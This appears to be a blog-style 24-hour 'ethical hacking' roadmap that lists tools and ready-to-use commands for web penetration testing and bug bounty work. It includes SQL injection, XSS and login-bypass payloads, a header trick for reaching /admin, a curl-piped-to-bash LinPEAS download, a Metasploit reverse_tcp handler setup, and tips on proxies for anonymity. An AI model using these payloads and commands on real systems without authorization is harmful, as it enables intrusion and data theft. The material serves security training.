24-Hour Ethical Hacking Roadmap

Hour 1-2

Setup & Environment

Skip the fluff and get straight to what matters.

Essential Setup:

Install Kali Linux (VMWare or VirtualBox)
Essential Tools Only - No bloat

Must-Have Tools:

Burp Suite Nmap Gobuster Nikto WhatWeb ffuf sqlmap Sublist3r/Amass

Hack: Use Kali Purple or Parrot OS only if you're doing red + blue. Stick with Kali for speed.

Hour 3-5

Recon (Find Targets Fast)

Information gathering is 50% of hacking.

Subdomain Enumeration:

subfinder -d target.com
assetfinder --subs-only target.com

Live Host Discovery:

httpx -l subs.txt -o live.txt

Directory Brute-Force:

ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt

🚀 Hack: Automate recon with Nuclei templates: nuclei -u https://target.com -t cves/,vulnerabilities/

Hour 6-8

Burp Suite Mastery

The hacker's microscope for web applications.

Key Features:

Proxy your browser and intercept everything
Use Repeater to modify requests and test payloads
Use Intruder for brute-forcing login, bypasses, etc.

Basic Auth Bypass Template:

GET /admin HTTP/1.1
Host: target.com
X-Original-URL: /admin

👉 Hack: Turn on "Intercept is off", go to "Target → Sitemap" and right-click → "Actively Scan".

Hour 9-12

High Impact Web Vulns

Focus on 5 vulns you can find and exploit in 5 mins:

1

SQL Injection

' OR 1=1--

sqlmap -u "https://target.com/page.php?id=1" --batch

2

XSS (Cross-Site Scripting)

Payload: <script>alert(1)</script>

Test input boxes, URL params, headers

3

File Upload

Upload .php or .htaccess to get RCE

Rename .jpg to .php.jpg

4

Authentication Bypass

Try admin' -- in login

Use Burp to remove X-Forwarded-For

Hour 13-15

Privilege Escalation

Getting from user to admin/system.

Useful Resources:

GTFOBins LinPEAS WinPEAS

Linux:

curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

Windows:

. .\winPEAS.exe

Hack: Always check:

SUID binaries (find / -perm -4000 2>/dev/null)
Cron jobs
Writable config files (/etc/passwd, .ssh, etc.)

Hour 16-17

Exploitation Frameworks

Metasploit:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Searchsploit:

searchsploit apache

👉 Hack: Exploit misconfigured services like VSFTPD, Samba, outdated CMSs.

Hour 18-19

Real-World Practice Labs

🔥 Shortcut Labs:

Hour 20-21

Reporting Templates

Save time and get paid with effective reporting.

Quick Bug Report Template:

Title: SQL Injection in search parameter

Summary: An SQLi vulnerability was found in the search parameter of target.com.

Steps to Reproduce:
1. Go to https://target.com/search?q=abc
2. Change to: q=abc' OR 1=1--
3. Observe database error / data leakage.

Impact: Attacker can extract sensitive data.

Payload: ' OR 1=1--

💰 Hack: Use ChatGPT or tools like Dradis for automating reporting structure.

Hour 22-23

Anonymity + Legal Safety

Use Proxies + VPNs
Learn Bug Bounty Disclosure Policies
Never test real sites without permission

🛡️ Hack: Always read robots.txt, /.git, /.env, /backup.zip — easy wins.

Hour 24

Build a Repeatable Workflow

The Ethical Hacking Loop

1. Recon

(subdomains, dirs)

2. Scan

(nmap, nuclei)

3. Probe

(with Burp)

4. Exploit

(manual + automation)

5. Report

(submit findings)